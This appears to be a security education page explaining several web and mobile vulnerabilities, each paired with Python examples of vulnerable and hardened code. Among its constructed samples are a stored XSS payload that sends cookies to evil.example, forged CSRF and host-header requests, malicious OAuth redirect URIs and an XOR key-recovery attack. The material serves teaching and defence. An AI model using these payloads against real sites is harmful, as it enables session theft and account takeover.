Vulnerability

What is Insecure OS/Firmware Hardcoded Password – Non-Privileged User Vulnerability?

Hardcoded credentials, also called embedded credentials, are plain-text secrets (account passwords, SSH keys, API tokens, CI/CD and other DevOps secrets) written directly into source code or into configuration that ships with it. Inserting unencrypted credentials into source code in this way is referred to as password or credential hardcoding. The practice is increasingly discouraged because such credentials create significant security …

What is Application-Level Denial-of-Service (DoS) Vulnerability?

Application-layer (layer 7) denial-of-service attacks exhaust a web application's own resources rather than, or in addition to, its network bandwidth. Requests that look legitimate but are expensive to serve (unbounded searches, large exports, report generation, slow clients that hold connections open) overwhelm the application servers and the databases behind them, preventing them from processing incoming requests and eventually forcing them down. In the distributed form (DDoS), computers, servers, and internet of things (IoT) devices are frequently hacked and …
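
One defence at this layer is to charge each request a cost that reflects how expensive the endpoint is to serve, instead of counting requests. The limiter below is an added example written for this page, not code from the original post; the endpoint costs, budget and traffic are constructed values, and the clock is passed in so the simulation is deterministic.

```python
from collections import deque

class CostAwareRateLimiter:
    """Sliding-window limiter charging each request a cost that reflects how expensive
    the endpoint is to serve. A client may spend at most `budget` units per `window`
    seconds, so a few expensive requests are cut off long before a plain request
    counter would notice anything unusual."""

    def __init__(self, budget, window, costs, default_cost=1):
        self.budget = budget            # cost units a client may spend per window
        self.window = window            # window length in seconds
        self.costs = costs              # endpoint -> cost (assumed values, tuned per app)
        self.default_cost = default_cost
        self._spent = {}                # client -> deque of (timestamp, cost)

    def allow(self, client, endpoint, now):
        """Return True and record the request if the client still has budget, else False.
        `now` is passed in (seconds) so the limiter is deterministic and testable."""
        cost = self.costs.get(endpoint, self.default_cost)
        history = self._spent.setdefault(client, deque())
        # Drop entries that have aged out of the window.
        while history and now - history[0][0] >= self.window:
            history.popleft()
        if sum(c for _, c in history) + cost > self.budget:
            return False
        history.append((now, cost))
        return True


# Constructed traffic: (time, client, endpoint). /search and /export hit the database
# hard; /health is trivially cheap.
ENDPOINT_COSTS = {"/search": 10, "/export": 20, "/health": 1}
TRAFFIC = [
    (0.0, "203.0.113.7", "/search"),
    (1.0, "203.0.113.7", "/search"),
    (2.0, "203.0.113.7", "/search"),    # third expensive call in 60 s: over budget
    (3.0, "203.0.113.7", "/export"),    # still over budget
    (3.5, "198.51.100.9", "/health"),   # another client is unaffected
    (61.0, "203.0.113.7", "/search"),   # window has slid past the first calls
]

def run_simulation(traffic=TRAFFIC, budget=20, window=60.0, costs=ENDPOINT_COSTS):
    limiter = CostAwareRateLimiter(budget, window, costs)
    return [limiter.allow(client, endpoint, t) for t, client, endpoint in traffic]

if __name__ == "__main__":
    for (t, client, endpoint), ok in zip(TRAFFIC, run_simulation()):
        print(f"t={t:5.1f} {client:14} {endpoint:8} -> {'allow' if ok else 'reject'}")
```

Three search calls are enough to trip the limit here, whereas a request counter set to a sensible value for cheap endpoints would let hundreds through. In production the per-client state lives in a shared store, the client key should combine source address with session or API key, and the costs should come from measured server time per endpoint.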

What is Cross-site request forgery (CSRF) Vulnerability?

Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user's browser to perform unwanted actions on a web application in which that user is currently logged in. Because the browser automatically attaches the session cookie to requests sent to the target site, an attacker who lures the user to a page they control, typically through social engineering (a link delivered by email or chat), can submit requests of the attacker's choosing under the victim's identity. If the target is …
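
The forged request and the two standard server-side checks, as an added example (not code from the original post): a handler that trusts the session cookie alone beside one that requires a matching Origin header and a synchronizer token bound to the session. Requests are modelled as plain dicts, the session id stands in for what the session cookie identifies, and the signing key, origin and forged request are constructed.

```python
import hashlib
import hmac
import secrets

# Per-deployment key used to bind CSRF tokens to sessions (assumed to come from config).
SERVER_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id):
    """Token = nonce.HMAC(session_id, nonce); embedded in the form the server renders.
    Tying it to the session means a token captured from another session is useless."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def verify_csrf_token(session_id, token):
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)

# Requests are plain dicts here: {"session": ..., "headers": {...}, "form": {...}}.

def change_email_vulnerable(request, accounts):
    """Trusts the session cookie alone. A form on an attacker's page that POSTs here
    is sent with the victim's cookie, so the change goes through."""
    accounts[request["session"]] = request["form"]["email"]
    return 200

def change_email_hardened(request, accounts, site_origin="https://app.example.com"):
    # 1. Origin check: browsers add Origin to cross-site POSTs and a page cannot forge it.
    if request["headers"].get("Origin") != site_origin:
        return 403
    # 2. Synchronizer token: the attacker's page cannot read the form the real site
    #    rendered (same-origin policy), so it cannot supply a valid token.
    if not verify_csrf_token(request["session"], request["form"].get("csrf_token", "")):
        return 403
    accounts[request["session"]] = request["form"]["email"]
    return 200

# Constructed forged request: victim's session, attacker's origin, no token.
FORGED = {
    "session": "sess-victim",
    "headers": {"Origin": "https://evil.example"},
    "form": {"email": "attacker@evil.example"},
}

def legitimate_request(session_id, new_email, site_origin="https://app.example.com"):
    """What the real form on the real site submits."""
    return {
        "session": session_id,
        "headers": {"Origin": site_origin},
        "form": {"email": new_email, "csrf_token": issue_csrf_token(session_id)},
    }
```

Either check alone blocks the classic attack; using both covers the cases where one is unavailable (older clients that omit Origin, or a token leaked by a separate bug). Setting the session cookie with `SameSite=Lax` or `Strict` adds a third, browser-enforced layer.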

What is Server-Side Request Forgery (SSRF) vulnerability?

Server-side request forgery (SSRF) is a web security flaw that lets an attacker induce a server-side application to make HTTP (or other) requests to a destination of the attacker's choosing. In a typical SSRF attack, the attacker instructs the server to connect to internal-only services within the organization's infrastructure, such as administrative interfaces or cloud metadata endpoints that are not reachable from the internet but are reachable from the server. In other circumstances, …
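
A validator for attacker-influenced outbound URLs, as an added example rather than code from the original post. It rejects non-HTTP schemes and userinfo tricks, resolves the hostname, refuses any answer that is not a public address, and returns the resolved IP so the caller can connect to that exact address. The resolver and its answers are a constructed stand-in for DNS.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver view; a real implementation would call socket.getaddrinfo.
FAKE_DNS = {
    "api.partner.example": ["93.184.216.34"],                  # ordinary public host
    "metadata.internal": ["169.254.169.254"],                  # private name for cloud metadata
    "rebind.attacker.example": ["93.184.216.34", "10.0.0.5"],  # mixed public/internal answers
}

def fake_resolve(hostname):
    """Return the A/AAAA answers for hostname, or [] for NXDOMAIN."""
    return FAKE_DNS.get(hostname, [])

def is_public(ip_text):
    addr = ipaddress.ip_address(ip_text)
    # is_global already excludes RFC 1918, loopback, link-local (incl. 169.254.169.254),
    # unspecified, reserved and shared address space; multicast is excluded explicitly.
    return addr.is_global and not addr.is_multicast

def validate_outbound_url(url, resolve=fake_resolve):
    """Return (ok, reason, pinned_ip). The caller must connect to pinned_ip (with the
    Host header set to the name) rather than resolving again; otherwise a DNS answer
    that changes between check and use (rebinding) defeats the check."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme", None
    host = parts.hostname
    if not host:
        return False, "no-host", None
    if parts.username is not None or parts.password is not None:
        return False, "userinfo", None   # e.g. http://trusted.example@169.254.169.254/
    try:
        ips = [str(ipaddress.ip_address(host))]   # IP literal, including [::1]
    except ValueError:
        ips = resolve(host)
    if not ips:
        return False, "unresolvable", None
    if not all(is_public(ip) for ip in ips):
        return False, "non-public-address", None
    return True, "ok", ips[0]
```

Two details matter in practice. First, the check runs on the resolved addresses, not on the hostname string: forms such as `http://2130706433/` (a decimal encoding of 127.0.0.1 that `getaddrinfo` accepts) or a name that resolves to 10.0.0.5 are caught only that way. Second, redirects must be re-validated hop by hop, because a public host can 302 to the metadata address.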

What is Cross-Site Scripting (XSS) Stored – Non-Privileged User to Anyone vulnerability?

A Stored Cross-Site Scripting (XSS) vulnerability occurs when a web application takes a string supplied earlier by an attacker, saves it on the server (commonly in the application's database), and later transmits it to a victim's browser in such a way that the browser executes part of the text as code. Because the payload is stored, it is delivered to every user who views the affected page, not only to a user who was tricked into clicking a crafted link. …
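
The difference between emitting a stored string raw and encoding it for its output context, as an added example (not code from the original post). The stored comment and the hostile author name are constructed payloads; `contains_active_markup` is a rough detector used only to compare the two renderers.

```python
import html

# Constructed payload a non-privileged user submitted as a comment; it is stored as-is.
STORED_COMMENT = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'

def render_comment_vulnerable(author, body):
    """Concatenates stored strings straight into the page: the browser of every viewer
    parses the comment as markup and runs the onerror handler."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'

def render_comment_hardened(author, body):
    """Encodes on output for the context the value lands in. html.escape(quote=True)
    covers element content and double-quoted attribute values; JavaScript, URL and CSS
    contexts need their own encoders (or, better, never receive user data)."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body, quote=True)}</p></div>')

def contains_active_markup(rendered):
    """Rough detector used only to compare the two renderers: does an <img> tag or an
    on* handler survive as markup rather than as text?"""
    lowered = rendered.lower()
    return "<img" in lowered or 'onerror="' in lowered or 'onmouseover="' in lowered

# Constructed author name that breaks out of the data-author attribute.
HOSTILE_AUTHOR = 'x" onmouseover="alert(1)'
```

Note that the fix is applied at render time, not at storage time: the same stored value may later be emitted into an e-mail, a JSON API or a PDF, each needing a different encoding, so sanitising once on input is not sufficient. A Content-Security-Policy without `unsafe-inline` limits the damage when an encoding is missed.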

What is Weak Password Reset Implementation – Token Leakage via Host Header Poisoning vulnerability?

Weak Password Reset Implementation – Token Leakage via Host Header Poisoning is a critical security issue for web applications and their users. It arises when an application builds the password-reset link it e-mails from the Host (or X-Forwarded-Host) header of the incoming request instead of from a configured canonical origin, and does not validate that header against an allow-list. In such cases, an attacker can manipulate …
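
The poisoned link beside the hardened one, as an added example that is not code from the original post. The canonical origin, allowed host set and request headers are constructed; the attacker's move is to request a reset for the victim's address while supplying their own domain in the headers, so the genuine reset e-mail carries a link to the attacker's server.

```python
from urllib.parse import urlencode

# Deployment configuration (assumed): the only origin the application is served from.
CANONICAL_ORIGIN = "https://app.example.com"
ALLOWED_HOSTS = {"app.example.com"}

def reset_link_vulnerable(headers, token):
    """Builds the link the victim will click from the request's own Host header (or the
    X-Forwarded-Host header many frameworks honour). Whoever controls those headers
    controls where the token is sent."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"https://{host}/reset?{urlencode({'token': token})}"

def reset_link_hardened(headers, token):
    """Rejects requests for an unexpected Host and never derives the origin from the
    request. Returns None when the request must be refused."""
    if headers.get("Host") not in ALLOWED_HOSTS:
        return None
    return f"{CANONICAL_ORIGIN}/reset?{urlencode({'token': token})}"

# Constructed attacker requests: the victim's e-mail in the form body, the attacker's
# domain in the headers, once directly and once via a forwarding header.
POISONED_HEADERS = {"Host": "evil.example"}
FORWARDED_HEADERS = {"Host": "app.example.com", "X-Forwarded-Host": "evil.example"}
```

The token itself can be perfectly random; the leak is in the transport. When the victim clicks the mailed link, the token arrives in the attacker's access log and the attacker completes the reset on the real site. The hardened version also drops X-Forwarded-Host entirely; if a reverse proxy genuinely needs it, the proxy should overwrite rather than pass through client-supplied values.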

What is OAuth Misconfiguration – Account Takeover vulnerability?

OAuth 2.0 is a web authorization framework: it lets a user grant a website limited access to their account on another service without handing that website their password (login with OAuth is layered on top of it by OpenID Connect). A flaw in the OAuth flow allows the takeover of the victim's account, most often because the authorization code or token is delivered to a destination the attacker controls. Unvalidated redirects and forwards become possible when a web application accepts untrusted input as the redirect target, which may lead …
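
How a loose redirect_uri check hands the authorization code to the attacker, and what the exact-match check looks like, as an added example written for this page (not code from the original post). The registered client, the attacker URIs and the state values are constructed.

```python
import hmac
import secrets
from urllib.parse import urlencode, urlsplit

# Constructed client registration.
REGISTERED_REDIRECT_URIS = {"https://app.example.com/oauth/callback"}

def redirect_uri_allowed_loose(uri):
    """Two common mistakes: a suffix match on the host and a prefix match on the path."""
    parts = urlsplit(uri)
    host_ok = (parts.hostname or "").endswith("example.com")
    path_ok = parts.path.startswith("/oauth")
    return parts.scheme == "https" and host_ok and path_ok

def redirect_uri_allowed_strict(uri):
    """Exact string comparison against the registered URI, as RFC 6749 section 3.1.2 and
    the OAuth 2.0 Security Best Current Practice call for."""
    return uri in REGISTERED_REDIRECT_URIS

def authorization_response(redirect_uri, state, allowed):
    """Where the authorization server sends the user's browser after consent. Whoever
    owns redirect_uri receives the code, so `allowed` decides whether the attacker or
    the real client ends up with it."""
    if not allowed(redirect_uri):
        return None
    code = secrets.token_urlsafe(24)
    sep = "&" if urlsplit(redirect_uri).query else "?"
    return f"{redirect_uri}{sep}{urlencode({'code': code, 'state': state})}"

def state_matches(session_state, returned_state):
    """The client must bind `state` to the user's session; otherwise an attacker can
    splice their own code into the victim's flow by replaying a callback URL."""
    return hmac.compare_digest(session_state, returned_state)

# Constructed attacker-supplied redirect URIs.
ATTACKER_URIS = [
    "https://attackerexample.com/oauth/callback",                       # host suffix match
    "https://app.example.com/oauth/../goto?url=https://evil.example",   # path prefix + open redirect
]
```

The second attacker URI never leaves the legitimate domain: it relies on path normalisation and an open redirect on the client to forward the code onwards, which is why the Security BCP rules out prefix matching even on a trusted host. PKCE closes the remaining gap for public clients, since a stolen code is useless without the verifier.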

What is Misconfigured DNS – High Impact Subdomain Takeover vulnerability?

A Misconfigured DNS – High Impact Subdomain Takeover vulnerability is a critical security issue that occurs when an attacker gains control over a subdomain of a website or application because a DNS record (typically a CNAME, but also an A record or an NS delegation) still points at an external resource that has been deprovisioned and can be claimed by anyone. Because the hijacked name sits under the organization's own domain, it inherits that domain's trust, including cookies scoped to the parent domain and entries in CORS or content-security allow-lists. This can lead to a range of high-impact attacks, such as phishing, data theft, and complete compromise of the affected subdomain. …
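
The check a defender runs over their own zone to find takeover candidates, as an added example (not code from the original post). The zone snapshot, the resolver answers and the list of providers that hand out unclaimed names are all constructed; a real run would read the zone from the DNS provider's API and resolve the targets with a real resolver.

```python
# Constructed snapshot of an organisation's zone: (name, record type, target).
ZONE = [
    ("www.example.com",    "CNAME", "example.com"),
    ("shop.example.com",   "CNAME", "example-shop.myshopify.example"),
    ("blog.example.com",   "CNAME", "example-blog.ghost-hosting.example"),
    ("status.example.com", "CNAME", "old-page.statuspage-host.example"),
    ("legacy.example.com", "CNAME", "decommissioned.partner-colo.example"),
    ("mail.example.com",   "MX",    "10 mx.example.com"),
]

# Constructed resolver view: only these CNAME targets still resolve.
LIVE_TARGETS = {"example.com", "example-shop.myshopify.example"}

# Hosting providers on which an unclaimed name can be registered by anyone
# (illustrative suffixes, not real providers).
CLAIMABLE_SUFFIXES = (".ghost-hosting.example", ".statuspage-host.example")

def fake_resolve(name):
    """Stand-in for a DNS lookup; [] means NXDOMAIN / no answer."""
    return ["93.184.216.34"] if name in LIVE_TARGETS else []

def find_dangling_cnames(zone=ZONE, resolve=fake_resolve, claimable_suffixes=CLAIMABLE_SUFFIXES):
    """Report CNAMEs whose target no longer resolves. 'claimable' flags the ones whose
    target sits on a provider that gives names to whoever asks first: those are the
    takeover candidates, the rest are merely broken links."""
    findings = []
    for name, rtype, target in zone:
        if rtype != "CNAME":
            continue
        if resolve(target):
            continue
        findings.append({
            "name": name,
            "target": target,
            "claimable": target.endswith(claimable_suffixes),
        })
    return findings
```

NXDOMAIN on the target is the classic signal, but some providers answer for every name and return a "no such site" page instead, so the real check also fingerprints the HTTP response. The fix is procedural as much as technical: delete the DNS record before, not after, the external resource is torn down.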

What is Cryptographic Flaw vulnerability?

Broken cryptography, meaning cryptography used in an unsafe manner, is widespread among mobile apps that encrypt data. It shows up in two ways. First, the app may rely on a fundamentally flawed encryption or decryption scheme (a home-grown algorithm, a weak or misused mode, a hardcoded or predictable key) that an attacker can exploit to recover sensitive data. Second, the …
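
One concrete instance of the first failure mode, as an added example written for this page (not code from the original post): a home-grown scheme that XORs stored records with a short fixed key compiled into the app, and the known-plaintext attack that recovers the key from a single record. The key, the records and the assumption that the attacker knows the key length (obtainable from the binary or by Hamming-distance analysis) are all constructed for the demonstration.

```python
# Deliberately flawed scheme of the kind found in mobile apps: "encryption" by XOR with a
# short fixed key compiled into the app. (Constructed example; the key is illustrative.)
HARDCODED_KEY = b"s3cr3tk3"

def xor_repeating(data, key):
    """Symmetric: the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def app_encrypt_record(record):
    """What the app does before writing a record to local storage."""
    return xor_repeating(record, HARDCODED_KEY)

def recover_key_known_plaintext(ciphertext, known_prefix, key_len):
    """Repeating-key XOR leaks the key wherever the plaintext is predictable. Records
    that all start with the same header (here a JSON object with a known first field)
    give the attacker key_len bytes of known plaintext, which is the whole key."""
    if len(known_prefix) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return xor_repeating(ciphertext[:key_len], known_prefix[:key_len])

def attack(ciphertexts, known_prefix=b'{"user":"', key_len=len(HARDCODED_KEY)):
    """Recover the key from one record and decrypt every other record with it.
    key_len is assumed known to the attacker (see lead-in)."""
    key = recover_key_known_plaintext(ciphertexts[0], known_prefix, key_len)
    return key, [xor_repeating(c, key) for c in ciphertexts]

# Constructed records the app stores "encrypted" on the device.
RECORDS = [
    b'{"user":"alice","pin":"4321"}',
    b'{"user":"bob","pin":"9876"}',
]
```

Nothing here depends on the key being hardcoded; even a per-install random key falls to the same attack because the scheme, not the key, is broken. The remedy is a vetted authenticated cipher (AES-GCM or ChaCha20-Poly1305) with a fresh nonce per record and a key held in the platform keystore, not a longer XOR key.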

What is Hardcoded Password vulnerability?

Hardcoded passwords, also called embedded credentials, are plain-text passwords or other secrets that are written directly into source code. Inserting unencrypted passwords and other secrets (SSH keys, API tokens, DevOps secrets, etc.) into source code is known as password hardcoding. Default, hardcoded passwords can be used across a wide range of …
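
A small scanner for the secrets described here and in the "Insecure OS/Firmware Hardcoded Password" entry above, as an added example (not code from the original posts). It combines shape-based patterns for secrets with a recognisable format with an entropy filter for generic `name = "value"` assignments, so placeholders are not reported. The sample source and every value in it are constructed; the patterns are illustrative and a real deployment would use a maintained rule set.

```python
import math
import re
from collections import Counter

# Constructed source snippet to scan; every value is a placeholder, not a real secret.
SAMPLE_SOURCE = '''
DB_PASSWORD = "Summer2023!"
AWS_ACCESS_KEY_ID = "AKIAEXAMPLEEXAMPLE00"
api_token = "sk_live_9f8b2c7d6e5a4f3b2c1d0e9f8a7b6c5d"
placeholder_password = "xxxxxxxx"
timeout = 30
password = os.environ["DB_PASSWORD"]
-----BEGIN RSA PRIVATE KEY-----
'''

# Secrets with a recognisable shape are matched directly; generic assignments to a
# secret-looking name are matched and then filtered by entropy to skip placeholders.
PATTERNS = {
    "aws_access_key":    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "assigned_secret":   re.compile(
        r"""(?i)\b(\w*(?:password|passwd|secret|token|api_key))\b\s*[:=]\s*['"]([^'"]+)['"]"""),
}

def shannon_entropy(s):
    """Bits per character; random-looking strings score high, 'xxxxxxxx' scores 0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def scan_source(text, entropy_threshold=2.5):
    """Return (line_no, rule, value) for each suspected hardcoded secret in `text`."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                if rule == "assigned_secret":
                    value = m.group(2)
                    if shannon_entropy(value) < entropy_threshold:
                        continue            # placeholders such as 'xxxxxxxx'
                else:
                    value = m.group(0)
                findings.append((line_no, rule, value))
    return findings

if __name__ == "__main__":
    for line_no, rule, value in scan_source(SAMPLE_SOURCE):
        print(f"line {line_no}: {rule}: {value}")
```

The line that reads the password from the environment is correctly ignored, which is the point: the remediation for every finding is to move the value out of the repository into an environment variable, a secrets manager or, for firmware, a per-device provisioning step, and then rotate it, since anything that was committed must be treated as disclosed.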